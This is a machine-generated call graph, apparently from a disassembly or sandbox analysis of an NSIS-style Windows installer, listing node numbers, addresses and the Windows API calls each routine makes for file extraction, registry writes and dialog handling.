4782->4788 4789 404dab GlobalFree 4783->4789 4783->4794 4784->4783 4790 404add 4785->4790 4786 404f1c 4786->4776 4795 404f31 ShowWindow GetDlgItem ShowWindow 4786->4795 4791 404d46 4787->4791 4789->4794 4793 404baa GetWindowLongW SetWindowLongW 4790->4793 4802 404ba4 4790->4802 4805 404b39 SendMessageW 4790->4805 4806 404b67 SendMessageW 4790->4806 4807 404b7b SendMessageW 4790->4807 4801 404d57 SendMessageW 4791->4801 4792->4768 4792->4777 4796 404bc4 4793->4796 4794->4786 4797 404de4 4794->4797 4800 40141d 80 API calls 4794->4800 4795->4776 4798 404be2 4796->4798 4799 404bca ShowWindow 4796->4799 4810 404e12 SendMessageW 4797->4810 4813 404e28 4797->4813 4815 403d98 SendMessageW 4798->4815 4814 403d98 SendMessageW 4799->4814 4800->4797 4801->4771 4802->4793 4802->4796 4805->4790 4806->4790 4807->4790 4808 404ef3 InvalidateRect 4808->4786 4809 404f09 4808->4809 4816 4043ad 4809->4816 4810->4813 4812 404ea1 SendMessageW SendMessageW 4812->4813 4813->4808 4813->4812 4814->4776 4815->4769 4817 4043cd 4816->4817 4818 406805 18 API calls 4817->4818 4819 40440d 4818->4819 4820 406805 18 API calls 4819->4820 4821 404418 4820->4821 4822 406805 18 API calls 4821->4822 4823 404428 lstrlenW wsprintfW SetDlgItemTextW 4822->4823 4823->4786 4824 4026fc 4825 401ee4 4824->4825 4827 402708 4824->4827 4825->4824 4826 406805 18 API calls 4825->4826 4826->4825 4276 4019fd 4277 40145c 18 API calls 4276->4277 4278 401a04 4277->4278 4279 405e7f 2 API calls 4278->4279 4280 401a0b 4279->4280 4828 4022fd 4829 40145c 18 API calls 4828->4829 4830 402304 GetFileVersionInfoSizeW 4829->4830 4831 40232b GlobalAlloc 4830->4831 4835 4030e3 4830->4835 4832 40233f GetFileVersionInfoW 4831->4832 4831->4835 4833 402350 VerQueryValueW 4832->4833 4834 402381 GlobalFree 4832->4834 4833->4834 4837 402369 4833->4837 4834->4835 4841 405f51 wsprintfW 4837->4841 4839 402375 4842 405f51 wsprintfW 4839->4842 4841->4839 4842->4834 4843 402afd 4844 40145c 18 API calls 4843->4844 4845 402b04 4844->4845 4850 405e50 GetFileAttributesW CreateFileW 4845->4850 4847 402b10 4848 4030e3 4847->4848 4851 405f51 wsprintfW 4847->4851 4850->4847 4851->4848 4852 4029ff 4853 401553 19 API calls 4852->4853 4854 402a09 4853->4854 4855 40145c 18 API calls 4854->4855 4856 402a12 4855->4856 4857 402a1f RegQueryValueExW 4856->4857 4859 401a13 4856->4859 4858 402a3f 4857->4858 4862 402a45 4857->4862 4858->4862 4863 405f51 wsprintfW 4858->4863 4861 4029e4 RegCloseKey 4861->4859 4862->4859 4862->4861 4863->4862 4864 401000 4865 401037 BeginPaint GetClientRect 4864->4865 4866 40100c DefWindowProcW 4864->4866 4868 4010fc 4865->4868 4869 401182 4866->4869 4870 401073 CreateBrushIndirect FillRect DeleteObject 4868->4870 4871 401105 4868->4871 4870->4868 4872 401170 EndPaint 4871->4872 4873 40110b CreateFontIndirectW 4871->4873 4872->4869 4873->4872 4874 40111b 6 API calls 4873->4874 4874->4872 4875 401f80 4876 401446 18 API calls 4875->4876 4877 401f88 4876->4877 4878 401446 18 API calls 4877->4878 4879 401f93 4878->4879 4880 401fa3 4879->4880 4881 40145c 18 API calls 4879->4881 4882 401fb3 4880->4882 4883 40145c 18 API calls 4880->4883 4881->4880 4884 402006 4882->4884 4885 401fbc 4882->4885 4883->4882 4887 40145c 18 API calls 4884->4887 4886 401446 18 API calls 4885->4886 4889 401fc4 4886->4889 4888 40200d 4887->4888 4890 40145c 18 API calls 4888->4890 4891 401446 18 API calls 4889->4891 4892 402016 FindWindowExW 4890->4892 4893 401fce 4891->4893 4897 402036 4892->4897 4894 401ff6 SendMessageW 4893->4894 4895 401fd8 SendMessageTimeoutW 4893->4895 4894->4897 4895->4897 4896 4030e3 4897->4896 4899 405f51 wsprintfW 4897->4899 4899->4896 4900 402880 4901 402884 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028a7 4902->4903 4904 40145c 18 API calls 4903->4904 4905 4028b1 4904->4905 4906 4028ba RegCreateKeyExW 4905->4906 4907 4028e8 4906->4907 4914 4029ef 4906->4914 4908 402934 4907->4908 4909 40145c 18 API calls 4907->4909 4910 402963 4908->4910 4913 401446 18 API calls 4908->4913 4912 4028fc lstrlenW 4909->4912 4911 4029ae RegSetValueExW 4910->4911 4915 40337f 37 API calls 4910->4915 4918 4029c6 RegCloseKey 4911->4918 4919 4029cb 4911->4919 4916 402918 4912->4916 4917 40292a 4912->4917 4920 402947 4913->4920 4921 40297b 4915->4921 4922 4062a3 11 API calls 4916->4922 4923 4062a3 11 API calls 4917->4923 4918->4914 4924 4062a3 11 API calls 4919->4924 4925 4062a3 11 API calls 4920->4925 4931 406224 4921->4931 4927 402922 4922->4927 4923->4908 4924->4918 4925->4910 4927->4911 4930 4062a3 11 API calls 4930->4927 4932 406247 4931->4932 4933 40628a 4932->4933 4934 40625c wsprintfW 4932->4934 4935 402991 4933->4935 4936 406293 lstrcatW 4933->4936 4934->4933 4934->4934 4935->4930 4936->4935 4937 402082 4938 401446 18 API calls 4937->4938 4939 402093 SetWindowLongW 4938->4939 4940 4030e3 4939->4940 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3966 403c83 3640->3966 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4023 406009 lstrcpynW 3651->4023 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4024 405e50 GetFileAttributesW CreateFileW 3674->4024 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4027 406009 lstrcpynW 3684->4027 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4025 405f51 wsprintfW 3696->4025 4026 406009 lstrcpynW 3696->4026 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4028 406a99 lstrcpyW 3704->4028 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3965 406009 lstrcpynW 3820->3965 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3915 40160c 3834->3915 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3915 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3942 40145c 3842->3942 3859 40145c 18 API calls 3843->3859 3957 401446 3844->3957 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3915 3847->3915 3964 405f51 wsprintfW 3847->3964 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3915 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3915 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3915 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3915 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3915 3879 4062a3 11 API calls 3868->3879 3869->3915 3870->3915 3871->3915 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3960 4062d5 FindFirstFileW 3874->3960 3885 40197f 3875->3885 3928 4019a1 3875->3928 3877 40169a 3887 4062a3 11 API calls 3877->3887 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3910 4062d5 2 API calls 3885->3910 3885->3928 3895 4016a7 3887->3895 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3915 3908 404f72 25 API calls 3892->3908 3904 4016b1 Sleep 3895->3904 3905 4016ae 3895->3905 3896 4019b8 GetShortPathNameW 3896->3915 3906 4018f5 3897->3906 3898->3915 3899->3915 3907 4062a3 11 API calls 3900->3907 3901 4018c2 3911 4062a3 11 API calls 3901->3911 3902 4018a9 3909 4062a3 11 API calls 3902->3909 3904->3915 3905->3904 3913 4062a3 11 API calls 3906->3913 3907->3915 3908->3915 3909->3915 3914 401991 3910->3914 3911->3915 3912 4017d4 3916 401864 3912->3916 3919 405d06 CharNextW 3912->3919 3937 4062a3 11 API calls 3912->3937 3917 401902 MoveFileW 3913->3917 3914->3928 3963 406009 lstrcpynW 3914->3963 3915->3832 3916->3892 3918 40186e 3916->3918 3920 401912 3917->3920 3921 40191e 3917->3921 3922 404f72 25 API calls 3918->3922 3924 4017e6 CreateDirectoryW 3919->3924 3920->3892 3926 401942 3921->3926 3931 4062d5 2 API calls 3921->3931 3927 401875 3922->3927 3924->3912 3925 4017fe GetLastError 3924->3925 3929 401827 GetFileAttributesW 3925->3929 3930 40180b GetLastError 3925->3930 3936 4062a3 11 API calls 3926->3936 3956 406009 lstrcpynW 3927->3956 3928->3896 3928->3915 3929->3912 3933 4062a3 11 API calls 3930->3933 3934 401929 3931->3934 3933->3912 3934->3926 3939 406c68 42 API calls 3934->3939 3935 401882 SetCurrentDirectoryW 3935->3915 3938 40195c 3936->3938 3937->3912 3938->3915 3940 401936 3939->3940 3941 404f72 25 API calls 3940->3941 3941->3926 3943 406805 18 API calls 3942->3943 3944 401488 3943->3944 3945 401497 3944->3945 3946 406038 5 API calls 3944->3946 3947 4062a3 lstrlenW wvsprintfW 3945->3947 3946->3945 3948 4060e7 9 API calls 3947->3948 3949 4017c9 3948->3949 3950 405d59 CharNextW CharNextW 3949->3950 3951 405d76 3950->3951 3952 405d88 3950->3952 3951->3952 3953 405d83 CharNextW 3951->3953 3954 405dac 3952->3954 3955 405d06 CharNextW 3952->3955 3953->3954 3954->3912 3955->3952 3956->3935 3958 406805 18 API calls 3957->3958 3959 401455 3958->3959 3959->3877 3961 4018a5 3960->3961 3962 4062eb FindClose 3960->3962 3961->3901 3961->3902 3962->3961 3963->3928 3964->3915 3965->3822 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 CoUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3653 4024->3677 4025->3696 4026->3696 4027->3685 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3706 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4941 402a84 4942 401553 19 API calls 4941->4942 4943 402a8e 4942->4943 4944 401446 18 API calls 4943->4944 4945 402a98 4944->4945 4946 401a13 4945->4946 4947 402ab2 RegEnumKeyW 4945->4947 4948 402abe RegEnumValueW 4945->4948 4949 402a7e 4947->4949 4948->4946 4948->4949 4949->4946 4950 4029e4 RegCloseKey 4949->4950 4950->4946 4951 402c8a 4952 402ca2 4951->4952 4953 402c8f 4951->4953 4955 40145c 18 API calls 4952->4955 4954 401446 18 API calls 4953->4954 4957 402c97 4954->4957 4956 402ca9 lstrlenW 4955->4956 4956->4957 4958 402ccb WriteFile 4957->4958 4959 401a13 4957->4959 4958->4959 4960 40400d 4961 40406a 4960->4961 4962 40401a lstrcpynA lstrlenA 4960->4962 4962->4961 4963 40404b 4962->4963 4963->4961 4964 404057 GlobalFree 4963->4964 4964->4961 4965 401d8e 4966 40145c 18 API calls 4965->4966 4967 401d95 ExpandEnvironmentStringsW 4966->4967 4968 401da8 4967->4968 4970 401db9 4967->4970 4969 401dad lstrcmpW 4968->4969 4968->4970 4969->4970 4971 401e0f 4972 401446 18 API calls 4971->4972 4973 401e17 4972->4973 4974 401446 18 API calls 4973->4974 4975 401e21 4974->4975 4976 4030e3 4975->4976 4978 405f51 wsprintfW 4975->4978 4978->4976 4979 402392 4980 40145c 18 API calls 4979->4980 4981 402399 4980->4981 4984 4071f8 4981->4984 4985 406ed2 25 API calls 4984->4985 4986 407218 4985->4986 4987 407222 lstrcpynW lstrcmpW 4986->4987 4988 4023a7 4986->4988 4989 407254 4987->4989 4990 40725a lstrcpynW 4987->4990 4989->4990 4990->4988 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4991 402797 4992 40145c 18 API calls 4991->4992 4993 4027ae 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027b7 4994->4995 4996 40145c 18 API calls 4995->4996 4997 4027c0 GetPrivateProfileStringW lstrcmpW 4996->4997 4998 402e18 4999 40145c 18 API calls 4998->4999 5000 402e1f FindFirstFileW 4999->5000 5001 402e32 5000->5001 5006 405f51 wsprintfW 5001->5006 5003 402e43 5007 406009 lstrcpynW 5003->5007 5005 402e50 5006->5003 5007->5005 5008 401e9a 5009 40145c 18 API calls 5008->5009 5010 401ea1 5009->5010 5011 401446 18 API calls 5010->5011 5012 401eab wsprintfW 5011->5012 4288 401a1f 4289 40145c 18 API calls 4288->4289 4290 401a26 4289->4290 4291 4062a3 11 API calls 4290->4291 4292 401a49 4291->4292 4293 401a64 4292->4293 4294 401a5c 4292->4294 4342 406009 lstrcpynW 4293->4342 4341 406009 lstrcpynW 4294->4341 4297 401a62 4301 406038 5 API calls 4297->4301 4298 401a6f 4299 406722 3 API calls 4298->4299 4300 401a75 lstrcatW 4299->4300 4300->4297 4303 401a81 4301->4303 4302 4062d5 2 API calls 4302->4303 4303->4302 4304 405e30 2 API calls 4303->4304 4306 401a98 CompareFileTime 4303->4306 4307 401ba9 4303->4307 4311 4062a3 11 API calls 4303->4311 4315 406009 lstrcpynW 4303->4315 4321 406805 18 API calls 4303->4321 4328 405ca0 MessageBoxIndirectW 4303->4328 4332 401b50 4303->4332 4339 401b5d 4303->4339 4340 405e50 GetFileAttributesW CreateFileW 4303->4340 4304->4303 4306->4303 4308 404f72 25 API calls 4307->4308 4310 401bb3 4308->4310 4309 404f72 25 API calls 4312 401b70 4309->4312 4313 40337f 37 API calls 4310->4313 4311->4303 4316 4062a3 11 API calls 4312->4316 4314 401bc6 4313->4314 4317 4062a3 11 API calls 4314->4317 4315->4303 4323 401b8b 4316->4323 4318 401bda 4317->4318 4319 401be9 SetFileTime 4318->4319 4320 401bf8 CloseHandle 4318->4320 4319->4320 4322 401c09 4320->4322 4320->4323 4321->4303 4324 401c21 4322->4324 4325 401c0e 4322->4325 4327 406805 18 API calls 4324->4327 4326 406805 18 API calls 4325->4326 4329 401c16 lstrcatW 4326->4329 4330 401c29 4327->4330 